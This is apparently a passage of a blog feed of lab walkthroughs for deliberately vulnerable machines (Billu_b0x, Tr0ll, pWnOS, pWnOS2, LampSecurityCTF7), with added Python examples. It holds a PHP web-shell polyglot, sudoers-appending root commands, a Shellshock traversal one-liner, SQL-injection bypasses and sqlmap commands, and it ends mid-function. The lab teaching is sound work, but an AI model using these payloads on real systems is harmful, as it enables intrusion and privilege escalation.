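            if c == "\\" and i + 1 < n:          # backslash escape
                lit.append(sql[i + 1])
                i += 2
            elif c == "'" and i + 1 < n and sql[i + 1] == "'":   # doubled quote
                lit.append("'")
                i += 2
            elif c == "'":                        # closing quote
                i, closed = i + 1, True
                break
            else:
                lit.append(c)
                i += 1
        pieces.append(("str" if closed else "unterminated", "".join(lit)))
    if buf:
        pieces.append(("sql", "".join(buf)))
    return pieces


def executed_shape(sql):
    """The statement with every literal collapsed to <str> and comments
    dropped: what the database actually evaluates."""
    out = [text if kind == "sql" else "<str>"
           for kind, text in mysql_lex(sql) if kind in ("sql", "str")]
    return " ".join("".join(out).split())


def demo_db():
    """Constructed in-memory stand-in for the auth table (plaintext password
    only to keep the example short; real code stores a password hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table auth(uname text, pass text)")
    conn.execute("insert into auth values ('admin', 'correct-horse')")
    return conn


def login_fixed(conn, un, ps):
    """Parameterised query: the values travel separately from the statement,
    so quotes or backslashes in them can never change its shape."""
    row = conn.execute(
        "select * from auth where pass=? and uname=?", (unquote(ps), unquote(un))
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    # The backslash in pass eats its own closing quote, so " and uname=" ends
    # up inside the literal and the rest of uname is parsed as SQL.
    q = build_query(" or 1=1 -- -", "\\")
    print(q)
    print(executed_shape(q))                               # pass=<str> or 1=1
    print(login_fixed(demo_db(), " or 1=1 -- -", "\\"))    # False
```

Stripping one dangerous character is the wrong abstraction: the lexer shows that the backslash, which the filter never touched, moves the boundary of a literal, and the bound parameter in login_fixed() is the only version in which the input cannot reach the lexer at all.
]]>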
<tags>
<tag> vulnhub target machine </tag>
</tags>
</entry>
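<![CDATA[
Worked example added to this write-up, not code from the image: panel.php's upload checks and load dispatch re-created in Python, to show that a GIF with PHP inside passes both checks and is then included as code, alongside the hardened versions this example proposes. The finfo sniff is emulated from magic bytes, and the web root path is an assumption.

```python
"""Replaying panel.php's upload and load checks, and why they compose into RCE.

Added example for this write-up; it is not code from the Billu_b0x image.
upload_accepted() reproduces the two server-side checks of panel.php: the
extension allow-list (pathinfo) and the finfo MIME sniff, the latter emulated
here by matching magic bytes, which is all libmagic needs to call a file an
image.  dispatch() reproduces the load handling, including the fact that the
"./" stripping is applied to $choice while the fallback include() uses the
raw POST value.  The safe_* functions are this example's suggested repair,
not anything from the image.  WEBROOT is an assumed path.
"""
import secrets

WEBROOT = "/var/www"                          # assumed; getcwd() on the target
ALLOWED_EXT = ("jpeg", "jpg", "gif", "png")   # from panel.php
MAGIC = (                                     # leading bytes libmagic keys on
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
)


def php_extension(name):
    """pathinfo($name, PATHINFO_EXTENSION): text after the last dot, else ''."""
    return name.rsplit(".", 1)[1] if "." in name else ""


def sniff_mime(data):
    """Emulate finfo(FILEINFO_MIME)->file() for the three image types."""
    for magic, mime in MAGIC:
        if data.startswith(magic):
            return mime + "; charset=binary"
    return "application/octet-stream; charset=binary"


def upload_accepted(name, data):
    """Both checks of panel.php, in the order it performs them."""
    if php_extension(name) not in ALLOWED_EXT:
        return False
    return any(t in sniff_mime(data) for t in ("image/jpeg", "image/png", "image/gif"))


def build_polyglot(php_source):
    """A file that is a GIF to libmagic and PHP to include(): the header is
    echoed as junk output, then the PHP block is executed."""
    return b"GIF89a" + b"\n" + php_source.encode()


def dispatch(load):
    """What panel.php does with POST load: the path it will include()."""
    choice = load.replace("./", "")           # applied to $choice only
    if choice in ("add", "show"):
        return WEBROOT + "/" + choice + ".php"
    return WEBROOT + "/" + load               # raw $_POST['load'], unfiltered


# Hardened counterparts proposed by this example.
PAGES = {"add": "add.php", "show": "show.php"}   # the only includable pages


def safe_dispatch(load):
    """Map the request value to a fixed file name; anything else is refused."""
    page = PAGES.get(load)
    return None if page is None else WEBROOT + "/" + page


def safe_store_name(name):
    """Never reuse the client's file name: random name plus an allow-listed
    extension, so the stored file is not reachable under an attacker-chosen
    path and carries no script-looking suffix."""
    ext = php_extension(name).lower()
    if ext not in ALLOWED_EXT:
        return None
    return "uploaded_images/" + secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    shell = build_polyglot("<?php system($_GET['c']); ?>")
    print(upload_accepted("shell.gif", shell))          # True: both checks pass
    print(dispatch("uploaded_images/shell.gif"))       # included, so executed
    print(safe_dispatch("uploaded_images/shell.gif"))  # None
```

Note that the two fixes are independent: safe_store_name() stops the attacker from choosing where the file lands, but only safe_dispatch() removes the include() of a user-controlled path, and the second one is the bug that turns an image upload into code execution.
]]>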
<entry>
<title>Tr0ll</title>
<link href="/2023/05/08/Tr0ll/"/>
<url>/2023/05/08/Tr0ll/</url>
<content type="html"><![CDATA[<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="Information gathering"></a>Information gathering</h2><h3 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap scan"></a>nmap scan</h3><p><img src="/2023/05/08/Tr0ll/image-20230507231822026.png" alt="image-20230507231822026"></p><p>The host's IP address is 192.168.37.129.</p><p><img src="/2023/05/08/Tr0ll/image-20230507231841442.png" alt="image-20230507231841442"></p><p>Open ports: 21, 22 and 80.</p><h2 id="ftp匿名登陆"><a href="#ftp匿名登陆" class="headerlink" title="Anonymous FTP login"></a>Anonymous FTP login</h2><p>Anonymous login succeeds and the directory holds a pcap capture. Fetch it with <code>get</code> and open it in Wireshark.</p><p><img src="/2023/05/08/Tr0ll/image-20230507231853919.png" alt="image-20230507231853919"></p><h2 id="pcap流量分析"><a href="#pcap流量分析" class="headerlink" title="pcap analysis"></a>pcap analysis</h2><p><img src="/2023/05/08/Tr0ll/image-20230508143724860.png" alt="image-20230508143724860"></p><blockquote><p><code>RETR</code> is an FTP command, short for "Retrieve": it tells the FTP server to send the named file to the client.</p><p>In an FTP session the client requests a file with <code>RETR</code> and the server returns the file as the response.</p><p>The client sends the command on the control connection and waits for the reply. If the file exists and the client is allowed to read it, the server sends the file contents over a separate data connection; the client writes the received data to a local file, completing the download.</p></blockquote><p><img src="/2023/05/08/Tr0ll/image-20230508145300570.png" alt="image-20230508145300570"></p><p>The FTP-DATA stream carries the file contents returned for that command, and they hint at sup3rs3cr3tdirlol, i.e. "super secret dir".</p><p>Try that directory on the web server.</p><h2 id="80端口"><a href="#80端口" class="headerlink" title="Port 80"></a>Port 80</h2><p>Download the file found there.</p><p><img src="/2023/05/08/Tr0ll/image-20230508145555350.png" alt="image-20230508145555350"></p><p><img src="/2023/05/08/Tr0ll/image-20230508152317759.png" alt="image-20230508152317759"></p><p>It hints at an address; requesting /0x0856BF/ reveals a new directory.</p><p><img src="/2023/05/08/Tr0ll/image-20230508152426222.png" alt="image-20230508152426222"></p><p>Download the folders under the new directory and inspect their contents.</p><p><img src="/2023/05/08/Tr0ll/image-20230508153030945.png" alt="image-20230508153030945"></p><p>The contents of which_one_lol.txt look like usernames, so the plan is a password spray with crackmapexec.</p><blockquote><p>About crackmapexec</p><p>CrackMapExec is an open-source penetration-testing tool for assessing a network's security and finding its weak points. It supports several protocols, such as SMB, LDAP and SSH, and can be used for password attacks, exploitation and information gathering.</p></blockquote><p><img src="/2023/05/08/Tr0ll/image-20230508153946048.png" alt="image-20230508153946048"></p><blockquote><p><code>crackmapexec ssh --help</code></p><p><code>--continue-on-success</code><br> continues authentication attempts even after successes</p></blockquote><p>The run errors out with port 22 being unreachable; the server apparently limits SSH login attempts over a short period. Retry with the word list reversed.</p><p><img src="/2023/05/08/Tr0ll/image-20230508160326969.png" alt="image-20230508160326969"></p><p>Every password is wrong. Since the folder also contains a hint about the password, try the file name itself as the password.</p><p><img src="/2023/05/08/Tr0ll/image-20230508160227625.png" alt="image-20230508160227625"></p><p><img src="/2023/05/08/Tr0ll/image-20230508160621079.png" alt="image-20230508160621079"></p><p>The credentials are recovered.</p><p><img src="/2023/05/08/Tr0ll/image-20230508161328272.png" alt="image-20230508161328272"></p><h2 id="提权"><a href="#提权" class="headerlink" title="Privilege escalation"></a>Privilege escalation</h2><p><img src="/2023/05/08/Tr0ll/image-20230508162525285.png" alt="image-20230508162525285"></p><p>While connected over SSH this message appears and the session is killed, which points at a scheduled task. The task runs as root, so find it and edit the script it executes: whatever is written there runs with root privileges on the next run.</p><p><img src="/2023/05/08/Tr0ll/image-20230508163033203.png" alt="image-20230508163033203"></p><p><img src="/2023/05/08/Tr0ll/image-20230508163209439.png" alt="image-20230508163209439"></p><blockquote><p>echo "overflow ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers</p></blockquote><p>That line, executed from the root-run script, gives the overflow user passwordless sudo.</p><p><img src="/2023/05/08/Tr0ll/image-20230508163305056.png" alt="image-20230508163305056"></p><p>Root obtained.</p>]]></content>
<tags>
<tag> vulnhub target machines </tag>
</tags>
</entry>
<entry>
<title>pWnOS</title>
<link href="/2023/04/21/pWnOS/"/>
<url>/2023/04/21/pWnOS/</url>
<content type="html"><![CDATA[<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>Information gathering</h2><h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>Host discovery</h3><p><img src="/2023/04/21/pWnOS/image-20230420230814057.png" alt="image-20230420230814057"></p><p>The target's IP address is 192.168.37.156.</p><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>Port scan</h3><p><img src="/2023/04/21/pWnOS/image-20230420231126078.png" alt="image-20230420231126078"></p><p><img src="/2023/04/21/pWnOS/image-20230420231153425.png" alt="image-20230420231153425"></p><p><img src="/2023/04/21/pWnOS/image-20230420233052448.png" alt="image-20230420233052448"></p><h2 id="Web渗透"><a href="#Web渗透" class="headerlink" title="Web渗透"></a>Web exploitation</h2><p>The nmap output reports an exploitable vulnerability in the service on port 10000.</p><p>searchsploit lists the exploit: Arbitrary File Disclosure.</p><p><img src="/2023/04/21/pWnOS/image-20230420233558907.png" alt="image-20230420233558907"></p><p><img src="/2023/04/21/pWnOS/image-20230420233815548.png" alt="image-20230420233815548"></p><p><img src="/2023/04/21/pWnOS/image-20230420233901884.png" alt="image-20230420233901884"></p><p>Save the retrieved shadow entries to hash.txt and crack them with john to recover the password.</p><p><img src="/2023/04/21/pWnOS/image-20230421102151592.png" alt="image-20230421102151592"></p><p><img src="/2023/04/21/pWnOS/image-20230421102203953.png" alt="image-20230421102203953"></p><p>This yields the account vmware with password h4ckm3; log in over SSH.</p><p><img src="/2023/04/21/pWnOS/image-20230421102219768.png" alt="image-20230421102219768"></p><p>Initial shell obtained.</p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>Privilege escalation</h2><p>2017.pl was able to read the shadow file, which requires root, so the process serving that file traversal runs as root. Upload a reverse-shell Perl script renamed with a .cgi extension, then request it through the same traversal: the server executes the CGI program instead of just returning it, and the resulting shell runs as root.</p><blockquote><p>A CGI program can be a Python script, a Perl script, a shell script, a C or C++ binary, and so on.</p></blockquote><p><img src="/2023/04/21/pWnOS/image-20230421121913020.png" alt="image-20230421121913020"></p><p>The upload path is /home/vmware: the initial shell runs as vmware, so files can be written into that directory.</p><p><img src="/2023/04/21/pWnOS/image-20230421122104221.png" alt="image-20230421122104221"></p><p>A CGI is a program, so remember to make it executable.</p><p><img src="/2023/04/21/pWnOS/image-20230421122034193.png" alt="image-20230421122034193"></p><p>Root obtained.</p><p><img src="/2023/04/21/pWnOS/image-20230421122202992.png" alt="image-20230421122202992"></p><p>Method two:</p><p><img src="/2023/04/21/pWnOS/image-20230421152111698.png" alt="image-20230421152111698"></p><p>This file exists if key-based (passwordless) SSH login has ever been set up for the account.</p><blockquote><p>Why ~/.ssh/authorized_keys exists</p><p>In the SSH protocol, public-key authentication lets a user authenticate with a key pair instead of a password. The private key stays on the client; the public key is added to the server's authorized_keys file.</p><p>When the user connects, the server checks whether the client can prove possession of a private key matching one of the stored public keys; if so, the login succeeds.</p><p>So ~/.ssh/authorized_keys holds the public keys accepted for that account. After generating a key pair on the client, the user copies the public key into the server's ~/.ssh/authorized_keys, and the server uses it to verify the user on later connections.</p></blockquote><blockquote><p>Sensitive-file wordlists</p><p><a href="https://github.com/carlospolop/Auto_Wordlists">https://github.com/carlospolop/Auto_Wordlists</a></p><p>Worth a look when you are out of ideas.</p></blockquote><p>With this file in hand, the next step is to match the public key against a set of candidate private keys.</p><p>PRNG: pseudo random number generator. The candidate set comes from the Debian OpenSSL predictable-PRNG bug (exploit-db 5622), which left only a small number of possible keys per key size.</p><p><img src="/2023/04/21/pWnOS/image-20230421152851223.png" alt="image-20230421152851223"></p><p><img src="/2023/04/21/pWnOS/image-20230421153605400.png" alt="image-20230421153605400"></p><p>Use it in these four steps:</p><p>1. Download the private/public key pair set.</p><p><img src="/2023/04/21/pWnOS/image-20230421153712737.png" alt="image-20230421153712737"></p><p>The repository has moved to GitLab.</p><p>New URL: <a href="https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/5622.tar.bz2">https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/5622.tar.bz2</a></p><p>Extract it and enter the directory.</p><p><code>grep -lr 'AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgv'</code></p><p>This searches the contents of every file under the directory for the key fragment AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgv and lists the matching files.</p><p><img src="/2023/04/21/pWnOS/image-20230421160222059.png" alt="image-20230421160222059"></p><p><img src="/2023/04/21/pWnOS/image-20230421160424731.png" alt="image-20230421160424731"></p><p>The .pub file is the public key; the file without an extension is the matching private key. View the private key.</p><p><img src="/2023/04/21/pWnOS/image-20230421160613342.png" alt="image-20230421160613342"></p><p><img src="/2023/04/21/pWnOS/image-20230421161334998.png" alt="image-20230421161334998"></p><p><img src="/2023/04/21/pWnOS/image-20230421161314855.png" alt="image-20230421161314855"></p><p>Initial shell obtained.</p><p>Check the bash version: Shellshock affects unpatched bash releases up to 4.3, so an old version is a strong hint, but confirm it with the test below rather than trusting the version number alone.</p><p><img src="/2023/04/21/pWnOS/image-20230421161929858.png" alt="image-20230421161929858"></p><p>Test command:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">env x='() { :; }; echo "It is vulnerable"' bash -c date</span><br></pre></td></tr></table></figure><p><img src="/2023/04/21/pWnOS/image-20230421162317739.png" alt="image-20230421162317739"></p><p>Vulnerable.</p><p>Create 1.cgi containing only <code>#!/bin/bash</code> and make it executable.</p><p><img src="/2023/04/21/pWnOS/image-20230421163618265.png" alt="image-20230421163618265"></p><p><code>curl http://192.168.37.156:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/home/vmware/1.cgi -A '() { :; }; /bin/echo "vmware ALL=(ALL)ALL" >> /etc/sudoers'</code></p><p><img src="/2023/04/21/pWnOS/image-20230421163706029.png" alt="image-20230421163706029"></p><p>The injected command appends vmware to /etc/sudoers with full sudo rights, so that user can now run any command as root (this rule still prompts for vmware's own password, which is known; NOPASSWD would remove the prompt).</p><p><img src="/2023/04/21/pWnOS/image-20230421164356170.png" alt="image-20230421164356170"></p>]]></content>
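<![CDATA[The key-matching step above (grepping the 5622 key set for a prefix of the authorized_keys blob), as an added example that is not part of the original writeup: it compares whole key blobs by SHA256 fingerprint, so a prefix shared between two keys cannot give a false match, and returns the private-key paths to try with ssh -i. It assumes the weak-key set's layout, NAME.pub next to NAME; all key material in demo() is constructed, not real RSA keys.

```python
"""Match authorized_keys entries against a directory of candidate key pairs.

Added example, not part of the original pWnOS writeup.
"""
import base64
import hashlib
import os
import tempfile


def _blob_fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 key blob."""
    raw = base64.b64decode(blob_b64)
    digest = base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")
    return "SHA256:" + digest


def parse_pubkeys(text):
    """Yield (fingerprint, keytype, comment) for each key line of an
    authorized_keys or .pub file; options before the key type are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        for i, tok in enumerate(parts[:-1]):
            if tok.startswith(("ssh-", "ecdsa-sha2-")):
                yield _blob_fingerprint(parts[i + 1]), tok, " ".join(parts[i + 2:])
                break


def find_private_keys(authorized_keys_text, key_dir):
    """Return sorted paths of private keys under key_dir whose .pub matches a
    key in authorized_keys (assumed layout: 'NAME.pub' next to 'NAME')."""
    wanted = {fp for fp, _, _ in parse_pubkeys(authorized_keys_text)}
    hits = []
    for root, _, files in os.walk(key_dir):
        for name in files:
            if not name.endswith(".pub"):
                continue
            with open(os.path.join(root, name)) as fh:
                pub = fh.read()
            if any(fp in wanted for fp, _, _ in parse_pubkeys(pub)):
                priv = os.path.join(root, name[:-4])
                if os.path.isfile(priv):
                    hits.append(priv)
    return sorted(hits)


def _fake_blob(seed):
    # Constructed blob: valid base64 with an SSH wire-format type prefix,
    # NOT real RSA material (a real 2048-bit blob is about 370 bytes).
    return base64.b64encode(b"\x00\x00\x00\x07ssh-rsa" + seed.encode().ljust(32, b"\0")).decode()


def demo():
    """Build a constructed key set in a temp dir and return the basenames of
    the private keys that match the constructed authorized_keys entry."""
    d = tempfile.mkdtemp()
    os.makedirs(os.path.join(d, "rsa"))
    for n in range(3):
        name = os.path.join(d, "rsa", f"key{n}")
        with open(name + ".pub", "w") as fh:
            fh.write(f"ssh-rsa {_fake_blob(f'key{n}')} root@weak\n")
        with open(name, "w") as fh:
            fh.write("-----BEGIN RSA PRIVATE KEY-----\n(constructed)\n-----END RSA PRIVATE KEY-----\n")
    # authorized_keys as found on a target: a comment, then an entry with options.
    auth = ("# keys for this account\n"
            f'command="/bin/true" ssh-rsa {_fake_blob("key1")} user@target\n')
    return [os.path.basename(h) for h in find_private_keys(auth, d)]


if __name__ == "__main__":
    print(demo())
```

Once a private key is found, `chmod 600` it before `ssh -i <key> user@target`, or the client refuses to use it.
]]>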
<tags>
<tag> vulnhub target machines </tag>
</tags>
</entry>
<entry>
<title>pWnOS2</title>
<link href="/2023/04/19/pWnOS2/"/>
<url>/2023/04/19/pWnOS2/</url>
<content type="html"><![CDATA[<h1 id="描述"><a href="#描述" class="headerlink" title="描述"></a>Description</h1><p><img src="/2023/04/19/pWnOS2/image-20230419184837454.png" alt="image-20230419184837454"></p><p>The network needs to be configured as described.</p><p><img src="/2023/04/19/pWnOS2/image-20230419190518461.png" alt="image-20230419190518461"></p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>Information gathering</h2><h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>Host discovery</h3><p><img src="/2023/04/19/pWnOS2/image-20230419190720917.png" alt="image-20230419190720917"></p><p>Target IP: 10.10.10.101</p><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>Port scan</h3><p><img src="/2023/04/19/pWnOS2/image-20230419190842652.png" alt="image-20230419190842652"></p><p><img src="/2023/04/19/pWnOS2/image-20230419191031046.png" alt="image-20230419191031046"></p><p><img src="/2023/04/19/pWnOS2/image-20230419191453168.png" alt="image-20230419191453168"></p><p>Only port 80 is open, so the target is clear: go straight to web testing.</p><h2 id="web渗透"><a href="#web渗透" class="headerlink" title="web渗透"></a>Web exploitation</h2><h3 id="目录爆破"><a href="#目录爆破" class="headerlink" title="目录爆破"></a>Directory brute force</h3><p><img src="/2023/04/19/pWnOS2/image-20230419193922789.png" alt="image-20230419193922789"></p><p>/blog has a login form; SQL injection attempts against it fail.</p><p><img src="/2023/04/19/pWnOS2/image-20230420112011263.png" alt="image-20230420112011263"></p><h3 id="CMS指纹利用"><a href="#CMS指纹利用" class="headerlink" title="CMS指纹利用"></a>CMS fingerprinting</h3><p>Press Ctrl+U to view the page source.</p><p><img src="/2023/04/19/pWnOS2/image-20230419194252821.png" alt="image-20230419194252821"></p><p>This reveals the site's CMS.</p><p>Check searchsploit for exploits.</p><p><img src="/2023/04/19/pWnOS2/image-20230420112128829.png" alt="image-20230420112128829"></p><p>Download the exploit and run it: <code>perl 1191.pl</code></p><p><img src="/2023/04/19/pWnOS2/image-20230420112200588.png" alt="image-20230420112200588"></p><p>In testing, options 1 and 2 of -e do not work; option 3 changes the account password, which then allows logging in to the blog.</p><p><img src="/2023/04/19/pWnOS2/image-20230420145632076.png" alt="image-20230420145632076"></p><p><img src="/2023/04/19/pWnOS2/image-20230420145648090.png" alt="image-20230420145648090"></p><p>New functions appear after login.</p><p><img src="/2023/04/19/pWnOS2/image-20230420145711342.png" alt="image-20230420145711342"></p><h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>File upload</h3><p>Upload a PHP shell through the file-upload function, start a listener on local port 1234, and request /images/shell.php to trigger the reverse shell.</p><p><img src="/2023/04/19/pWnOS2/image-20230420150019130.png" alt="image-20230420150019130"></p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>Privilege escalation</h2><p>There are two accounts of interest: root and dan.</p><p><img src="/2023/04/19/pWnOS2/image-20230420153811528.png" alt="image-20230420153811528"></p><p>mysqli_connect.php contains database credentials.</p><p><img src="/2023/04/19/pWnOS2/image-20230420151457324.png" alt="image-20230420151457324"></p><p>The password is rejected; this is probably a stale copy of the config. Search the whole filesystem for other copies of mysqli_connect.php.</p><p><img src="/2023/04/19/pWnOS2/image-20230420151708725.png" alt="image-20230420151708725"></p><p><img src="/2023/04/19/pWnOS2/image-20230420151821123.png" alt="image-20230420151821123"></p><p>This yields another set of credentials.</p><p><img src="/2023/04/19/pWnOS2/image-20230420151849828.png" alt="image-20230420151849828"></p><p>The users table in the MySQL database contains:<img src="/2023/04/19/pWnOS2/image-20230420152230801.png" alt="image-20230420152230801"></p><p>hash-identifier classifies the hash as SHA-1.</p><p><img src="/2023/04/19/pWnOS2/image-20230420153058676.png" alt="image-20230420153058676"></p><p><a href="https://hashes.com/en/decrypt/hash">https://hashes.com/en/decrypt/hash</a></p><p><img src="/2023/04/19/pWnOS2/image-20230420153031328.png" alt="image-20230420153031328"></p><p><img src="/2023/04/19/pWnOS2/image-20230420153658422.png" alt="image-20230420153658422"></p><p><img src="/2023/04/19/pWnOS2/image-20230420154002193.png" alt="image-20230420154002193"></p><p>mysqli_connect.php also holds a database password; trying it for the root account works (administrators often reuse the same credentials in different places).</p><p><img src="/2023/04/19/pWnOS2/image-20230420154117645.png" alt="image-20230420154117645"></p><p>Root obtained.</p>]]></content>
<tags>
<tag> vulnhub target machines </tag>
</tags>
</entry>
<entry>
<title>LampSecurityCTF7</title>
<link href="/2023/04/18/LampSecurityCTF7/"/>
<url>/2023/04/18/LampSecurityCTF7/</url>
<content type="html"><![CDATA[<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>Information gathering</h2><h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>Host discovery</h3><blockquote><p>nmap did not find this machine's IP at first; the fix is described here:</p><p><a href="https://blog.csdn.net/sinat_35845281/article/details/126067936">CTF7 machine IP not found by scanning</a></p></blockquote><p><code>nmap -sn 192.168.37.0/24</code></p><img src="/2023/04/18/LampSecurityCTF7/image-20230417191211759.png" alt="image-20230417191211759" style="zoom: 67%;"><p>Target IP: 192.168.37.153</p><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>Port scan</h3><p><code>sudo nmap --min-rate=10000 -p- 192.168.37.153</code></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417191852697.png" alt="image-20230417191852697"></p><p><code>sudo nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.37.153</code></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417192209139.png" alt="image-20230417192209139"></p><p>Two web services are running, on ports 80 and 8080.</p><h3 id="nmap漏洞扫描"><a href="#nmap漏洞扫描" class="headerlink" title="nmap漏洞扫描"></a>nmap vulnerability scan</h3><p><code>sudo nmap --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.37.153</code></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417192443832.png" alt="image-20230417192443832"></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417192526096.png" alt="image-20230417192526096"></p><p>Nothing directly useful.</p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>Directory scan</h3><h2 id="web渗透"><a href="#web渗透" class="headerlink" title="web渗透"></a>Web exploitation</h2><h3 id="80端口"><a href="#80端口" class="headerlink" title="80端口"></a>Port 80</h3><p>Browsing the site shows a login page and an account-creation page.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417193919733.png" alt="image-20230417193919733"></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417193942888.png" alt="image-20230417193942888"></p><p>After creating an account and logging in, a parameter that looks injectable appears.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417194150755.png" alt="image-20230417194150755"></p><p>Test it with sqlmap:</p><p><code>sqlmap -u "http://192.168.37.153/newsletter&id=1" --cookie="PHPSESSID=mt4a0vcp21m5koj76emphcsd73" --dbs </code></p><p>Press F12 and run document.cookie in the console to read the session ID.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417194345709.png" alt="image-20230417194345709"></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417195157466.png" alt="image-20230417195157466"></p><p><code>sqlmap -u "http://192.168.37.153/newsletter&id=1" --cookie="PHPSESSID=mt4a0vcp21m5koj76emphcsd73" --dbs -D website --tables</code></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418155347844.png" alt="image-20230418155347844"></p><p><code>sqlmap -u "http://192.168.37.153/newsletter&id=1" --cookie="PHPSESSID=mt4a0vcp21m5koj76emphcsd73" --dbs -D website --tables -T users --columns</code><br><img src="/2023/04/18/LampSecurityCTF7/image-20230418155409000.png" alt="image-20230418155409000"></p><p>There is no password column, so this path is a dead end.</p><h3 id="8080端口"><a href="#8080端口" class="headerlink" title="8080端口"></a>Port 8080</h3><p>A login page; try a SQL authentication-bypass string.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418184434049.png" alt="image-20230418184434049"></p><p>Nothing is filtered and the login succeeds.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418184531686.png" alt="image-20230418184531686"></p><p>This looks like the admin back end.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418185029522.png" alt="image-20230418185029522"></p><p>Newsletters published here are visible on port 80.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418185154885.png" alt="image-20230418185154885"></p><p>The content is treated as plain text, so it cannot be used to get a reverse shell.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418185541016.png" alt="image-20230418185541016"></p><p>There is also a file upload; upload a PHP reverse shell.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418191013848.png" alt="image-20230418191013848"></p><p>The PHP file uploads successfully; now find the directory shell.php was stored in.</p><p>From the directory brute-force results, /assets holds shell.php.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418191809547.png" alt="image-20230418191809547"></p><p>Opening shell.php triggers the reverse shell.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418191853937.png" alt="image-20230418191853937"></p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>Privilege escalation</h2><p>/var/www/admin/inc/db.php shows that the database has no password.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418192726458.png" alt="image-20230418192726458"></p><p>Log in to the database.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418193443482.png" alt="image-20230418193443482"></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418193525075.png" alt="image-20230418193525075"></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418193425832.png" alt="image-20230418193425832"></p><p>The brian account has login history, so it is the first target.</p><p>Save the dump to data.txt and split the username and password columns with awk into user.txt and passwd.txt.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418194109809.png" alt="image-20230418194109809"></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418194209337.png" alt="image-20230418194209337"></p><p>Crack the MD5 hashes, save the plaintexts in 1.txt, and try them one by one; the working pair is brian:my2cents.</p><p>Switch user.</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418201611686.png" alt="image-20230418201611686"></p><p>Root obtained.</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>The data sqlmap extracted through the port-80 injection matches the database seen after getting the initial shell, but for some reason sqlmap could not enumerate the password column, so the credentials could not be obtained directly. Odd; still unresolved.</p>]]></content>
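<![CDATA[The hash identification and cracking done by hand on pWnOS2 (SHA-1 from the users table, via hash-identifier and an online lookup) and on CTF7 above (MD5 from the admin database, tried one plaintext at a time), as one added example that is not part of either writeup. The user rows and the wordlist are constructed sample data; the only pair taken from the page is brian:my2cents, whose hash is computed here rather than copied.

```python
"""Identify unsalted hashes by length and crack them against a wordlist.

Added example, not part of the original writeups.
"""
import hashlib

# Hex-digest length -> algorithm. Length is only a hypothesis: MD5 and NTLM
# are both 32 hex characters, and a salted scheme can look identical; the
# guess is confirmed only when a hash actually cracks.
_BY_LENGTH = {32: "md5", 40: "sha1", 64: "sha256"}


def identify(hexhash):
    """Guess the algorithm from the digest length; None if not a hex digest."""
    h = hexhash.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return None
    return _BY_LENGTH.get(len(h))


def parse_dump(text):
    """Parse 'username:hash' lines (the awk split used on CTF7) into a dict."""
    users = {}
    for line in text.splitlines():
        if ":" in line:
            name, h = line.split(":", 1)
            users[name.strip()] = h.strip().lower()
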